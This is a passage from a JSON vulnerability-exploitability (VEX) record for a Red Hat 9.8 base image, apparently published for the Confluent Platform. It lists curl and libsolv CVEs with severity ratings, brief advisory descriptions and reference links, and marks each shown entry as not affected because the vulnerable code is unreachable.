          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-8926",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        522
      ],
      "description": "When asking curl to use a `.netrc` file to find credentials and at the same\ntime specifying a URL with a username(without a password), like\n`https://user@example.com/`, curl could wrongly get and use the password for\n*another* user set in the `.netrc` file for that host if such a one exists and\nthere is no match for the specified user.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8926"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8926"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8926.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8926.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8926.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-vw2x-3w8j-rq82"
        },
        {
          "url": "https://hackerone.com/reports/3735184"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8926"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8926"
        }
      ],
      "published": "2026-07-03T07:16:25+00:00",
      "updated": "2026-07-07T23:02:54+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-9149",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        122
      ],
      "description": "A flaw was found in libsolv. This heap buffer overflow vulnerability occurs when a victim processes a specially crafted `.solv` file containing negative size values in the `repo_add_solv` function. This leads to an undersized memory allocation and a subsequent out-of-bounds write. An attacker could exploit this to cause a denial of service (DoS).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-9149"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:21333"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28236"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:48818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-9149"
        },
        {
          "url": "https://bugzilla.redhat.com/2460379"
        },
        {
          "url": "https://bugzilla.redhat.com/2460380"
        },
        {
          "url": "https://bugzilla.redhat.com/2460425"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460425"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-48864"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9149"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9150"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-28236.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28236"
        },
        {
          "url": "https://github.com/openSUSE/libsolv/pull/617"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-9149.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-28236.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9149"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-9149"
        }
      ],
      "published": "2026-05-21T00:16:35+00:00",
      "updated": "2026-07-31T18:17:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.7.24-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-9150",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        121
      ],
      "description": "A flaw was found in libsolv. This stack-based buffer overflow vulnerability occurs in libsolv's Debian metadata parser when processing specially crafted Debian repository metadata. An attacker could exploit this by providing malicious SHA384 or SHA512 checksum tags, leading to memory corruption and a denial of service (DoS) in the affected system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-9150"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:21333"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28236"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30649"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:48818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-9150"
        },
        {
          "url": "https://bugzilla.redhat.com/2460379"
        },
        {
          "url": "https://bugzilla.redhat.com/2460380"
        },
        {
          "url": "https://bugzilla.redhat.com/2460425"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460425"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-48864"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9149"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9150"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-28236.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28236"
        },
        {
          "url": "https://github.com/openSUSE/libsolv/pull/616"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-9150.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-28236.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9150"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-9150"
        }
      ],
      "published": "2026-05-20T23:16:36+00:00",
      "updated": "2026-07-31T18:17:38+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.7.24-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libsolv@0.7.24-6.el9_8?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-9547",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "When a libcurl-based application performs transfers via `SCP://` or `SFTP://`\nand utilizes the `CURLOPT_SSH_KEYFUNCTION` callback, it may silently accept an\nuntrusted server. This vulnerability occurs when a server presents a host key\ntype that does not match the specific key type already recorded for that host\nin the `known_hosts` file. Instead of rejecting the mismatch, the callback\nmechanism fails to properly enforce the restriction, allowing the connection\nto succeed without warning and risking a potential man-in-the-middle attack.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-9547"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55439"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-9547"
        },
        {
          "url": "https://bugzilla.redhat.com/2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/2496763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496763"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-9547.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-9547.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-9547.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3783"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8286"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9547"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55439.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55439"
        },
        {
          "url": "https://github.com/advisories/GHSA-xq9p-gxg6-f7q6"
        },
        {
          "url": "https://hackerone.com/reports/3751712"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-9547.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9547"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-9547"
        }
      ],
      "published": "2026-07-03T07:16:25+00:00",
      "updated": "2026-07-07T14:52:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
